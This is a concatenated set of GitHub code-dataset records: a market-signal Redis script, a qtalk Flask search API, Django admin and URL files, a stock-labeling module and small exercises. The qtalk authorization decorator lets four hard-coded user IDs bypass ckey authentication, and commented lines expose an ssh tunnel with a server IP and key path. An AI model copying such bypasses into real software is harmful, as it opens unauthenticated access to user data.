#_=redis_msig.rpush(MSIG_OUTPUT,pickle.dumps(msig_data))\n if(len(events_price)>0 or len(events_volume)>0):\n #TODO! sendToMYsql is slow. 
work on optimizing it.\n #Generate news signal\n if(cli_options.enableNewsGeneration):\n print(\"Generating news...\")\n try:\n MSig.sendNewsToFrontEnd(msig_data,cli_options,df_market_capital_price,df_market_capital_volume,num_events_price_gain=len(events_price_gain),num_events_volume_gain=len(events_volume_gain),isStartofDay=isStartofDay)\n print(\"Done\")\n except Exception as e:\n print(e)\n if(cli_options.saveToMysql):\n try:\n event_price_ids,event_volume_ids=MSig.sendToMysql(msig_data,cli_options.mysql_host,cli_options.mysql_port,cli_options.mysql_db,cli_options.mysql_user,cli_options.mysql_pass)\n except Exception as e:\n print(e)\n pass\n else:\n event_price_ids=[]\n event_volume_ids=[]\n #Generate prediction signal\n if(cli_options.enablePrediction):\n print(\"Triggering MModel for predictive models based on this batch...\")\n mmodel_data={\"events_price\":events_price.to_dict(),\"events_volume\":events_volume.to_dict(),\"event_volume_ids\":event_volume_ids,\\\n \"event_price_ids\":event_price_ids,\"price_columns\":list(all_data[\"df_price_data\"].columns),\\\n \"volume_columns\":list(all_data[\"df_volume_data\"].columns), \"regimes_price\":df_regimes_price.to_dict(),\\\n \"regimes_volume\":df_regimes_volume.to_dict(),\"ts_price_min\":all_data[\"ts_price_min\"],\"ts_price_max\":all_data[\"ts_price_max\"],\"ts_volume_min\":all_data[\"ts_volume_min\"],\\\n \"bucket_size_msec\": cli_options.bucket_size_msec,\"ts_volume_max\":all_data[\"ts_volume_max\"]}\n mmodal_data_serial=json.dumps(mmodel_data)\n _=redis_msig.xadd(MSIG_OUTPUT,{'data':mmodal_data_serial})\n else:\n print(\"No events detected... Not enough data...\")\n msig_clock=time.time()\n end_time=time.time()\n if((len(events_price)>0 or len(events_volume)>0) and cli_options.saveToMysql):\n print(\"Saving the session parameters...\")\n MSig.saveSessionInfo(event_price_ids,event_volume_ids,cli_options,start*1000,end_time*1000)\n print(loop_num, \". loop took\",end_time-start,\"sec. Not bad?\")\n\n else:\n if(isLoopOnce):return\n is_system_start=False\n print(\"Sleeping until the next period starts in\",process_period,\"sec. Now your chance to change any parameters on msig redis. Don't kill me if parallel threads are running.\\n\")\n print(\"Don't kill me yet. 
Wait for the Thread to send 'Done' signal!\\n\")\n time.sleep(process_period)\n \n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n# import pickle\n# outfile=open(\"all_data\",'wb')\n# pickle.dump(all_data,outfile)\n# outfile.close()\n#####\n # ports=[item for item in range(6400,6470)]\n # for p in ports:\n # args=[\"--redis_port\",str(p)]\n # main(args,isLoopOnce=True)\n # print(p,\"Done\")\n\n\n#redis_msig.delete(MSIG_OUTPUT)\n\n#x=rts.lrange(\"msig:output\",0,-1)\n#rdcli -h localhost -p 6380\n#ssh -L 6379:localhost:6379 ubuntu@34.223.57.176 -i $HOME\\.ssh\\bastion1.pem\n#ssh -L 6379:localhost:6379 ubuntu@34.223.57.176 -i ~/.ssh/bastion1.pem\n#ssh -L 6380:localhost:6380 ubuntu@34.223.57.176 -i ~/.ssh/bastion1.pem\n# from redistimeseries.client import Client\n# rts = Client(host='localhost', port=6380)\n\n# result=rts.range('rts1:01:symbol:BLKB:price', 0, -1)\n","repo_name":"sametdumankaya/MicroserviceStack","sub_path":"MSig/MSig_start.py","file_name":"MSig_start.py","file_ext":"py","file_size_in_byte":30352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12894290366","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n__author__ = 'jingyu.he'\n\nfrom flask import request, jsonify, Blueprint\nimport json\nimport requests\nimport asyncio\nfrom conf.constants import is_check_ckey, auth_ckey_url, if_cached, r_domain\nfrom conf.search_params_define import *\nfrom utils.request_util import RequestUtil\nfrom utils.redis_utils import RedisUtil\nfrom service.search.contact import Contact\nfrom service.search.lookback import Lookback\n\nsearch_blueprint = Blueprint('search', __name__)\n\n# -------------------------- 生成logger --------------------------\nlog_path = get_logger_file(name='search.log')\nsearch_logger = configure_logger('search', log_path)\n\n# -------------------------- 读取默认配置 --------------------------\nif is_check_ckey:\n search_logger.info(\"CKEY AUTHORIZATION INITIALING...\")\n from utils.authorization import check_ckey\n# -------------------------- 既定的配置 --------------------------\n\nip = str()\ns_args = dict()\nl_args = dict()\n\n# -------------------------- 鉴权修饰器 --------------------------\ndef authorization(func):\n def wrapper(*args, **kw):\n ckey = ''\n user_id = 'DEFAULT'\n user = ''\n request_util = RequestUtil()\n res = False\n __args = request_util.get_request_args(request)\n user_id = __args.get('qtalkId', 'UNKOWN')\n user_domain = None\n if '@' in user_id:\n _user = user_id.split('@')\n user = _user[0]\n user_domain = _user[1]\n else:\n user = user_id\n if isinstance(r_domain, str):\n user_domain = r_domain\n user_id = user_id + '@' + user_domain\n if user_id in ['guanghui.yang@ejabhost1','jingyu.he@ejabhost1','chaos.dong@ejabhost1','binz.zhang@ejabhost1']:\n return func(user_id=user_id, args=__args, *args, **kw)\n elif is_check_ckey:\n ckey = request_util.get_ckey(request)\n if ckey:\n if auth_ckey_url:\n try:\n r_data = {\n 'ckey': ckey,\n 'system': 'search'\n }\n ret = requests.post(url=auth_ckey_url, json=r_data)\n \"\"\"{\n \"ret\": true,\n \"errcode\": 0,\n \"errmsg\": \"\",\n \"data\": {\n \"d\": \"qtalk.test.org\",\n \"u\": \"aaa.bb\"\n }\n }\"\"\"\n\n if ret.json().get('ret') and ret.json().get('data',{}).get('u','')+ '@' + ret.json().get('data',{}).get('d','') == user_id:\n if user_domain and ret.json().get('data').get('d') != user_domain:\n return jsonify(ret=False, errcode=500, msg=\"Error domain\")\n # TODO remove this after domain check is soon needless\n elif not user_domain:\n 
user_domain = ret.json().get('data',{}).get('d')\n res = True\n # user = user_id + '@' + user_domain\n user = user + '@' + user_domain\n\n else:\n search_logger.error(\"ckey api check failed : ret {} u {}\".format(ret.json().get('ret'),user_id)) \n except (requests.RequestException or KeyError) as e:\n search_logger.error(\"ckey api failed : {}\".format(e))\n # TODO notify developer to check\n res, user = check_ckey(ckey)\n except Exception as e:\n search_logger.exception(\"ckey api failed : {}\".format(e))\n else:\n res, user = check_ckey(ckey)\n if res:\n return func(user_id=user, args=__args, *args, **kw)\n else:\n search_logger.info(\"user:{user} login failed, ckey : {ckey}, \\\n \".format(user=user_id, ckey=ckey))\n return jsonify(ret=False, errcode=0, message=\"ckey check failed\")\n return func(user_id=user_id, args=__args, *args, **kw)\n\n wrapper.__name__ = func.__name__\n return wrapper\n\n\n@search_blueprint.route('/search', methods=['GET', 'POST'])\n@authorization\ndef main(user_id, args):\n # 记录每个ip 每次搜索的最后一次请求\n global ip, s_args\n # 对于某些请求时间很长的操作 不进行timeout限制\n extend_time = False\n\n request_ip = request.remote_addr\n if not s_args:\n s_args = args\n if ip != request_ip:\n ip = request_ip\n search_logger.info(ip + ' : \\n{}'.format(json.dumps(s_args, ensure_ascii=False, indent=4)))\n s_args = args\n\n # 将str的action转为二进制 按照define里的定义长度\n if 'platform' in args:\n _group_id = ''\n else:\n _group_id = args.get(\"groupId\", 0)\n action = ''\n if (_group_id or _group_id == '') and 'action' not in args:\n if _group_id == '':\n action = '7'\n elif _group_id == 'Q01':\n action = '1'\n elif _group_id == 'Q02':\n action = '2'\n elif _group_id == 'Q07':\n action = '4'\n elif ('action' not in args) and ('groupId' not in args):\n if args.get('platform','').lower() == 'ios': # 此处等ios兼容后就删掉\n action = '7'\n else:\n return jsonify(ret=False, errcode=500, msg=\"WRONG ACTION\")\n else:\n\n action = args.get(\"action\", 0)\n if int(action) == 63:\n action = 31\n elif int(action) in [1,2,4,6,8,16,32]:\n extend_time = True\n\n try:\n if isinstance(action, str):\n action = format(int(action), \"b\")\n elif isinstance(action, int):\n action = bin(action)\n _register = dict()\n register_len = len(TYPE_REGISTER)\n for _p, _n in enumerate(action[-1: -1 - register_len: -1]):\n _register[TYPE_REGISTER[_p]] = (_n == '1')\n except (KeyError, ValueError, TypeError) as e:\n search_logger.exception(e)\n return jsonify(ret=False, errcode=500, msg=\"WRONG ACTION\")\n\n # 获取相关任务准备进行协程分配\n register = [k for k, v in _register.items() if v is True]\n if_contact = []\n if_lookback = []\n for t in register:\n if t in ACTION_REGISTER['contact']:\n if_contact.append(t)\n if t in ACTION_REGISTER['lookback']:\n if_lookback.append(t)\n\n # 搜索关键词限制\n if if_contact or if_lookback:\n _key = args.get('key', '').strip()\n if len(_key) < 2:\n return jsonify(ret=False, errcode=500, msg=\"key is illegal\")\n elif len(_key) > 20:\n args['key'] = _key[:20]\n else:\n args['key'] = _key\n # TODO 或许要加上剪切提示\n if if_cached:\n redis_util = RedisUtil()\n user_habit = redis_util.get_user_habit(user_id=user_id)\n else:\n user_habit = ''\n data = ''\n if if_contact or if_lookback:\n data = asyncio.run(\n go_coro(if_contact=if_contact, if_lookback=if_lookback, args=args, user=user_id, habit=user_habit, extend_time=extend_time))\n # TODO: data处理\n else:\n search_logger.error(\"NO TASK FOUND ACTION : {}\".format(action))\n\n return jsonify(ret=True, errcode=0, errmsg='', data=data)\n\n\nasync def go_coro(if_contact, if_lookback, args, user, 
habit, extend_time=False):\n contact = ''\n lookback = ''\n tasks = []\n timeout = 60 if extend_time else 10\n if if_contact:\n contact = Contact(user_id=user, args=args, habit=habit, extend_time=extend_time)\n # 我也不是很懂为啥要把共同群组融进去 于是结构变得有点奇怪 以后看能不能sql搞定吧\n if ('common_muc' in if_contact) or ('muc' in if_contact):\n if ('common_muc' in if_contact) and ('muc' in if_contact):\n t = asyncio.create_task(contact.router['muc'](user_id=user, origin=True, common=True))\n tasks.append(t)\n if_contact.remove('muc')\n if_contact.remove('common_muc')\n elif ('common_muc' not in if_contact) and ('muc' in if_contact):\n t = asyncio.create_task(contact.router['muc'](user_id=user, origin=True, common=False))\n tasks.append(t)\n if_contact.remove('muc')\n elif ('common_muc' in if_contact) and ('muc' not in if_contact):\n t = asyncio.create_task(contact.router['muc'](user_id=user, origin=False, common=True))\n tasks.append(t)\n if_contact.remove('common_muc')\n else:\n raise BaseException(\"UNEXPECTED IF_CONTACT SITUATION\")\n if if_contact:\n for todo in if_contact:\n t = asyncio.create_task(contact.router[todo](user))\n tasks.append(t)\n if if_lookback:\n lookback = Lookback(user_id=user, args=args, extend_time=extend_time)\n # for todo in if_lookback:\n # t = asyncio.create_task(lookback.router[todo](user))\n # tasks.append(t)\n if 'hs_file' in if_lookback:\n t = asyncio.create_task(lookback.lookback_coro(todo=['hs_file']))\n tasks.append(t)\n if_lookback.remove('hs_file')\n if if_lookback:\n t = asyncio.create_task(lookback.lookback_coro(todo=if_lookback))\n tasks.append(t)\n completed, pending = await asyncio.wait(tasks, timeout=timeout)\n for pen in pending:\n search_logger.error(\"PENDING TASK FOUND {}\".format(pen))\n pen.cancel()\n result = []\n for com in completed:\n # t = com.result()\n if com.result():\n result.append(com.result())\n # sort_key = ['联系人列表', '群组列表', '共同群组', '单人历史', '群组历史', '']\n sort_key = ['联系人', '群组', '聊天记录', '文件', '']\n\n search_logger.debug(\"label {}\".format(result))\n result = sorted(result, key=lambda x: sort_key.index(x.get('groupLabel', '')))\n # 关闭数据库连接\n if contact:\n contact.userlib.close()\n if lookback:\n await lookback.close_conn()\n return result\n","repo_name":"gtouchgogo/qtalk_search","sub_path":"service/search/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":10404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28334629391","text":"# -*- coding: utf-8 -*-\nimport webapp2\nfrom google.appengine.datastore.datastore_query import Cursor\nfrom google.appengine.ext import ndb\nfrom collections import OrderedDict, Counter\nfrom wtforms import fields\nfrom bp_includes import forms\nfrom bp_includes.lib.basehandler import BaseHandler\n\nfrom bp_includes.models import Group\nimport logging\n\n\nclass AdminGroupListHandler(BaseHandler):\n def get(self):\n p = self.request.get('p')\n q = self.request.get('q')\n c = self.request.get('c')\n forward = True if p not in ['prev'] else False\n cursor = Cursor(urlsafe=c)\n\n if q:\n qry = Group.query(ndb.OR(Group.name == q.lower()))\n else:\n qry = Group.query()\n\n PAGE_SIZE = 50\n if forward:\n groups, next_cursor, more = qry.order(self.user_model.key).fetch_page(PAGE_SIZE, start_cursor=cursor)\n if next_cursor and more:\n self.view.next_cursor = next_cursor\n if c:\n self.view.prev_cursor = cursor.reversed()\n else:\n groups, next_cursor, more = qry.order(-self.user_model.key).fetch_page(PAGE_SIZE, start_cursor=cursor)\n groups = 
list(reversed(groups))\n if next_cursor and more:\n self.view.prev_cursor = next_cursor\n self.view.next_cursor = cursor.reversed()\n\n def pager_url(p, cursor):\n params = OrderedDict()\n if q:\n params['q'] = q\n if p in ['prev']:\n params['p'] = p\n if cursor:\n params['c'] = cursor.urlsafe()\n return self.uri_for('admin-groups-list', **params)\n\n self.view.pager_url = pager_url\n self.view.q = q\n\n params = {\n \"list_columns\": [('name', 'Name'),\n ('can_view', 'Can View'),\n ('can_edit', 'Can Edit'),\n ('can_administer', 'Can Adminster'),\n ('can_upload', 'Can Upload'),\n ],\n \"groups\": groups,\n \"count\": qry.count()\n }\n return self.render_template('admin_groups_list.html', **params)\n \n \nclass AdminGroupEditHandler(BaseHandler):\n def get_or_404(self, group_id):\n try:\n group = Group.get_by_id(long(group_id))\n if group:\n return group\n except ValueError:\n pass\n self.abort(404)\n \n def edit(self, group_id=None):\n if group_id:\n group = self.get_or_404(group_id)\n else:\n group = Group() \n\n if self.request.POST:\n if self.form.validate():\n self.form.populate_obj(group)\n group.put()\n self.add_message(\"Changes saved!\", 'success')\n import time\n time.sleep(1)\n #return self.redirect_to(\"admin-groups-list\", group_id=group_id)\n return self.redirect('/admin/groups/')\n else:\n self.add_message(\"Could not save changes!\", 'danger')\n else:\n self.form.process(obj=group)\n pass\n \n for field in self.form:\n logging.info(field)\n \n\n params = {\n 'group': group\n } \n return self.render_template('admin_group_edit.html', **params)\n\n @webapp2.cached_property\n def form(self):\n f = forms.EditGroupForm(self)\n return f","repo_name":"govtmirror/KS-2014","sub_path":"Upload_mod/bp_admin/groups.py","file_name":"groups.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69930025447","text":"\"\"\"\nData Labeling methode\nReference: https://towardsdatascience.com/the-triple-barrier-method-251268419dcd\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef plot_barriers_out(barriers, filename):\n plt.style.use('seaborn')\n plt.rcParams['figure.figsize'] = [16, 9]\n plt.rcParams['figure.dpi'] = 300\n plt.rcParams['font.size'] = 20\n plt.rcParams['axes.labelsize'] = 20\n plt.rcParams['axes.titlesize'] = 24\n plt.rcParams['xtick.labelsize'] = 16\n plt.rcParams['ytick.labelsize'] = 16\n plt.rcParams['font.family'] = 'serif'\n\n plt.plot(barriers.out, 'bo')\n\n plt.savefig(filename + '.png')\n plt.clf()\n\ndef plot_barriers_dynamic(barriers, t_final, filename):\n fig, ax = plt.subplots()\n ax.set(title='stock price', xlabel='date', ylabel='price')\n ax.plot(barriers.price[100: 200])\n start = barriers.index[120]\n end = barriers.vert_barrier[120]\n upper_barrier = barriers.top_barrier[120]\n lower_barrier = barriers.bottom_barrier[120]\n ax.plot([start, end], [upper_barrier, upper_barrier], 'r--')\n ax.plot([start, end], [lower_barrier, lower_barrier], 'r--')\n ax.plot([start, end], [(lower_barrier + upper_barrier) * 0.5,\n (lower_barrier + upper_barrier) * 0.5], 'r--')\n ax.plot([start, start], [lower_barrier, upper_barrier], 'r-')\n ax.plot([end, end], [lower_barrier, upper_barrier], 'r-')\n\n fig.savefig(filename + '_1.png')\n\n # dynamic graph\n fig, ax = plt.subplots()\n ax.set(title='Apple stock price',\n xlabel='date', ylabel='price')\n ax.plot(barriers.price[100: 200])\n start = barriers.index[120]\n end = barriers.index[120 + 
t_final]\n upper_barrier = barriers.top_barrier[120]\n lower_barrier = barriers.bottom_barrier[120]\n ax.plot(barriers.index[120:120 + t_final + 1], barriers.top_barrier[start:end], 'r--')\n ax.plot(barriers.index[120:120 + t_final + 1], barriers.bottom_barrier[start:end], 'r--')\n ax.plot([start, end], [(lower_barrier + upper_barrier) * 0.5,\n (lower_barrier + upper_barrier) * 0.5], 'r--')\n ax.plot([start, start], [lower_barrier, upper_barrier], 'r-')\n ax.plot([end, end], [barriers.bottom_barrier[end], barriers.top_barrier[end]], 'r-')\n\n fig.savefig(filename + '_2.png')\n\n# for intraday data\ndef get_daily_volatility_for_intraday_data(close,span0=100):\n # daily vol, reindexed to close\n df0=close.index.searchsorted(close.index-pd.Timedelta(days=1))\n df0=df0[df0>0]\n a = df0 -1 #using a variable to avoid the error message.\n df0=pd.Series(close.index[a], index=close.index[close.shape[0]-df0.shape[0]:])\n df0=close.loc[df0.index]/close.loc[df0.values].values-1\n # daily returns\n df0=df0.ewm(span=span0).std()\n return df0\n\n# for daily data\ndef get_daily_volatility_for_daily_data(close,span0=20):\n # simple percentage returns\n df0=close.pct_change()\n # 20 days, a month EWM's std as boundary\n df0=df0.ewm(span=span0).std()\n df0.dropna(inplace=True)\n return df0\n\ndef get_3_barriers(prices, high, low, daily_volatility, t_final, upper_lower_multipliers):\n #create a container\n barriers = pd.DataFrame(columns=['days_passed', 'price', 'high', 'low', 'vert_barrier', 'top_barrier', 'bottom_barrier'],\n index = daily_volatility.index)\n for day, vol in daily_volatility.iteritems():\n days_passed = len(daily_volatility.loc[daily_volatility.index[0] : day])\n #set the vertical barrier\n if (days_passed + t_final < len(daily_volatility.index) and t_final != 0):\n vert_barrier = daily_volatility.index[days_passed + t_final]\n else:\n # Labeling with nan ending\n vert_barrier = np.nan\n decreasing = False\n if decreasing:\n # Labeling with decreasing ending\n vert_barrier = daily_volatility.index[len(daily_volatility.index) - 1]\n #set the top barrier\n if upper_lower_multipliers[0] > 0:\n top_barrier = prices.loc[day] + prices.loc[day] * upper_lower_multipliers[0] * vol\n else:\n #set it to NaNs\n top_barrier = pd.Series(index=prices.index)\n #set the bottom barrier\n if upper_lower_multipliers[1] > 0:\n bottom_barrier = prices.loc[day] - prices.loc[day] * upper_lower_multipliers[1] * vol\n else:\n #set it to NaNs\n bottom_barrier = pd.Series(index=prices.index)\n\n barriers.loc[day, ['days_passed', 'price', 'high', 'low', 'vert_barrier','top_barrier', 'bottom_barrier']] = days_passed, prices.loc[day], high.loc[day], low.loc[day], vert_barrier, top_barrier, bottom_barrier\n\n barriers['out'] = None\n return barriers\n\n\ndef get_labels(barriers, label_below=0, label_middle=1, label_above=2, use_high_low=False):\n '''\n start: first day of the window\n end:last day of the window\n price_initial: first day stock price\n price_final:last day stock price\n top_barrier: profit taking limit\n bottom_barrier:stop loss limt\n condition_pt:top_barrier touching conditon\n condition_sl:bottom_barrier touching conditon\n '''\n floating = False\n for i in range(len(barriers.index)):\n start = barriers.index[i]\n end = barriers.vert_barrier[i]\n if pd.notna(end):\n # assign the top and bottom barriers\n top_barrier = barriers.top_barrier[i]\n bottom_barrier = barriers.bottom_barrier[i]\n #set the profit taking and stop loss conditons\n if use_high_low == True:\n high_price = barriers.high[start: 
end].copy()\n low_price = barriers.low[start: end].copy()\n else:\n high_price = barriers.price[start: end].copy()\n low_price = barriers.price[start: end].copy()\n\n condition_pt = (high_price >= top_barrier).any()\n condition_sl = (low_price <= bottom_barrier).any()\n #set the first to reach the barrier\n if condition_pt and condition_sl:\n cpt_date = barriers.index[i]\n condition_pt_loc = False\n j=1\n while (cpt_date <= end) and (condition_pt_loc == False):\n if(high_price[cpt_date] >= top_barrier):\n condition_pt_loc = cpt_date\n else:\n cpt_date = barriers.index[i+j]\n j=j+1\n cpt_date = barriers.index[i]\n condition_sl_loc = False\n j=1\n while (cpt_date <= end) and (condition_sl_loc == False):\n if(low_price[cpt_date] <= bottom_barrier):\n condition_sl_loc = cpt_date\n else:\n cpt_date = barriers.index[i+j]\n j=j+1\n if condition_pt_loc < condition_sl_loc:\n condition_sl = False\n else:\n condition_pt = False\n #assign the labels\n if condition_pt:\n barriers['out'][i] = label_above\n elif condition_sl:\n barriers['out'][i] = label_below\n else:\n if not floating:\n barriers['out'][i] = label_middle\n else:\n price_initial = barriers.price[start]\n price_final = barriers.price[end]\n barriers['out'][i] = max([(price_final - price_initial) / (top_barrier - price_initial),\n (price_final - price_initial) / (price_initial - bottom_barrier)],\n key=abs)\n return barriers\n\ndef is_in_half_brackets(df, limit_high, limit_low):\n if ((df.out.sum() <= limit_high) and (df.out.sum() >= limit_low)):\n return True\n else:\n return False\n\ndef is_over_brackets(df, limit_high):\n if (df.out.sum() >= limit_high):\n return True\n else:\n return False\n\ndef is_under_brackets(df, limit_low):\n if (df.out.sum() <= limit_low):\n return True\n else:\n return False\n\ndef get_balanced_upper_multiplier(prices, highs, lows,\n daily_volatility, t_final,\n upper_multiplier, lower_multiplier,\n label_below, label_middle, label_above, use_high_low):\n min_max_range = 0.5 # Range between the max upper_multiplier and min upper_multiplier\n coef_threshold = 0.001 # Balance +/- coef precision\n \n upper_multiplier_max = upper_multiplier + upper_multiplier * min_max_range\n upper_multiplier_min = upper_multiplier - upper_multiplier * min_max_range\n high_threshold = int(len(prices) * 0.5 + len(prices) * coef_threshold)\n low_threshold = int(len(prices) * 0.5 - len(prices) * coef_threshold)\n\n barriers = get_3_barriers(prices, highs, lows, daily_volatility, t_final, [upper_multiplier_max, lower_multiplier])\n barriers = get_labels(barriers, label_below, label_middle, label_above, use_high_low)\n\n if is_in_half_brackets(barriers, high_threshold, low_threshold):\n return barriers\n else:\n if is_over_brackets(barriers, high_threshold):\n # upper_multiplier over boundaries\n return barriers\n\n barriers = get_3_barriers(prices, highs, lows, daily_volatility, t_final, [upper_multiplier_min, lower_multiplier])\n barriers = get_labels(barriers, label_below, label_middle, label_above, use_high_low)\n\n if is_in_half_brackets(barriers, high_threshold, low_threshold):\n return barriers\n else:\n if is_under_brackets(barriers, low_threshold):\n # upper_multiplier under boundaries\n return barriers\n while True:\n upper_multiplier_step = upper_multiplier_min + (upper_multiplier_max - upper_multiplier_min) * 0.5\n barriers = get_3_barriers(prices, highs, lows, daily_volatility, t_final, [upper_multiplier_step, lower_multiplier])\n barriers = get_labels(barriers, label_below, label_middle, label_above, use_high_low)\n\n if 
is_in_half_brackets(barriers, high_threshold, low_threshold):\n print(\"Upper multiplier coef: \",upper_multiplier_step)\n return barriers\n else:\n if is_under_brackets(barriers, low_threshold):\n upper_multiplier_max = upper_multiplier_step\n else:\n upper_multiplier_min = upper_multiplier_step\n\ndef data_labeling(df, params = None):\n debug = False\n t_final = 10 # how many days we hold the stock which set the vertical barrier\n upper_multiplier = 2\n lower_multiplier = 2\n label_below = 0\n label_middle = 1\n label_above = 2\n use_balanced_upper_multiplier = False\n use_high_low = False\n if params:\n debug = params.get('labeling_debug', debug)\n t_final = params.get('labeling_t_final', t_final)\n if isinstance(t_final, str):\n t_final = int(t_final)\n upper_multiplier = params.get('labeling_upper_multiplier', upper_multiplier)\n if isinstance(upper_multiplier, str):\n upper_multiplier = float(upper_multiplier)\n lower_multiplier = params.get('labeling_lower_multiplier', lower_multiplier)\n if isinstance(lower_multiplier, str):\n lower_multiplier = float(lower_multiplier)\n label_below = params.get('labeling_label_below', label_below)\n if isinstance(label_below, str):\n label_below = float(label_below)\n label_middle = params.get('labeling_label_middle', label_middle)\n if isinstance(label_middle, str):\n label_middle = float(label_middle)\n label_above = params.get('labeling_label_above', label_above)\n if isinstance(label_above, str):\n label_above = float(label_above)\n use_balanced_upper_multiplier = params.get('use_balanced_upper_multiplier', use_balanced_upper_multiplier)\n if isinstance(use_balanced_upper_multiplier, str):\n use_balanced_upper_multiplier = bool(use_balanced_upper_multiplier)\n use_high_low = params.get('use_high_low', use_high_low)\n if isinstance(use_high_low, str):\n use_high_low = bool(use_high_low)\n\n price = df[\"close\"].copy()\n high = df[\"high\"].copy()\n low = df[\"low\"].copy()\n\n #set the boundary of barriers, based on 20 days EWM\n daily_volatility = get_daily_volatility_for_daily_data(price)\n\n #align the index\n prices = price[daily_volatility.index]\n highs = high[daily_volatility.index]\n lows = low[daily_volatility.index]\n\n if use_balanced_upper_multiplier:\n # Find optimized upper_multiplier coef in order to get balanced labeling feature\n barriers = get_balanced_upper_multiplier(prices, highs, lows,\n daily_volatility, t_final,\n upper_multiplier, lower_multiplier,\n label_below, label_middle, label_above, use_high_low)\n else:\n barriers = get_3_barriers(prices, highs, lows, daily_volatility, t_final, [upper_multiplier, lower_multiplier])\n barriers = get_labels(barriers, label_below, label_middle, label_above)\n\n if debug:\n plot_barriers_out(barriers, filename=\"./test/generated/labeling_barriers_out\")\n plot_barriers_dynamic(barriers, t_final, filename=\"./test/generated/labeling_barriers_dynamic\")\n barriers.to_csv(\"./test/generated/labeling_barriers.csv\")\n\n df[\"labeling\"] = barriers['out'].copy()\n \n return df\n","repo_name":"cedfactory/fdp","sub_path":"src/indicators_flabeling.py","file_name":"indicators_flabeling.py","file_ext":"py","file_size_in_byte":13674,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"5686263202","text":"T = int(input())\n# 여러개의 테스트 케이스가 주어지므로, 각각을 처리합니다.\nfor test_case in range(1, T + 1):\n count = 0\n data = list(str(test_case))\n for i in data :\n if(i==\"3\")or(i==\"6\")or(i==\"9\") :\n count += 1\n if(count>=1) :\n 
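# editor's note: in the 3-6-9 game a number containing 3, 6 or 9 is clapped instead of spoken, printed here as one '-' per such digit\n        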
print(\"-\"*count,end=' ')\n else :\n print(test_case,end=' ')\n","repo_name":"woodypef/tolife","sub_path":"SWEA/D2/[1926]간단한369게임.py","file_name":"[1926]간단한369게임.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38156419305","text":"from django.urls import path\n\nfrom animal_lib.articles.views import ArticleListView, DraftListView, CreateArticleView, EditArticleView, DetailArticleView\nfrom animal_lib.articles.forms import ArticleForm\napp_name = 'articles'\n\nurlpatterns = [\n path(\"\", ArticleListView.as_view(), name=\"list\"),\n path(\"write-new-article/\", CreateArticleView.as_view(form_class=ArticleForm, template_name=\"articles/article_create.html\"), name=\"write_new\"),\n path(\"articles/drafts/\", DraftListView.as_view(), name=\"drafts\"),\n path(\"articles/edit//\", EditArticleView.as_view(), name=\"edit_article\"),\n path(\"articles//\", DetailArticleView.as_view(), name=\"article\"),\n]\n","repo_name":"John-Boland/animal_lib","sub_path":"animal_lib/articles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14196274638","text":"from django.shortcuts import render, redirect\nfrom miniProject.models import Thought\nfrom random import randint\nfrom datetime import datetime\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nimport pickle\nimport os\n\ndef removeStopwords(text):\n tokens = word_tokenize(text)\n cleaned = [token for token in tokens if token not in stopwords.words('english')]\n return \" \".join(cleaned)\n\n# Create your views here\n\ndef home(request):\n return render(request, 'layout.html')\n\ndef project(request):\n context = {\n 'img' : randint(1,4),\n }\n if request.method == 'POST':\n thoughts = request.POST.get('thts')\n tht = Thought(thoughts = thoughts)\n tht.save()\n return redirect('/analysis')\n return render(request, 'start.html', context)\n\ndef analysis(request):\n text = Thought.objects.order_by('id')[len(Thought.objects.order_by('id'))-1].thoughts\n cleaned_text = removeStopwords(text)\n\n here = os.path.dirname(os.path.abspath(__file__))\n filename = os.path.join(here, 'lr.pkl')\n lrmodel = pickle.load(open(filename, 'rb'))\n filename = os.path.join(here, 'vectorizer.pkl')\n vectorizer = pickle.load(open(filename,'rb'))\n vector = vectorizer.transform([cleaned_text])\n\n dct = dct = dict(zip(lrmodel.classes_,lrmodel.predict_proba(vector)[0]*100))\n for i in dct:\n dct[i] = str(round(dct[i],2))+'%'\n\n context = {\n 'bruh' : cleaned_text,\n 'prime_emotion' : change_emotion_form(lrmodel.predict(vector)[0]),\n 'emotions' : dct,\n }\n return render(request, 'analysis.html', context)\n\n\n# UTILITY MEHTODS\n\ndef change_emotion_form(emotion):\n dct = {\n 'fear' : 'scared',\n 'anger' : 'angry',\n 'joy' : 'happy',\n 'surprise' : 'surprised',\n 'sadness' : 'sad',\n 'love' : 'in love'\n }\n return dct[emotion]\n","repo_name":"GodaKartik/Emotion-Analyser","sub_path":"miniProject/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70077534570","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 3 09:44:07 2022\n\n@author: tosun\n\"\"\"\n\n\"\"\"for i in dir(cv2):\n if 'EVENT' in i:\n print(i)\"\"\"\n\nimport cv2\nimport numpy as np\n\ncizim = False\nmod = 
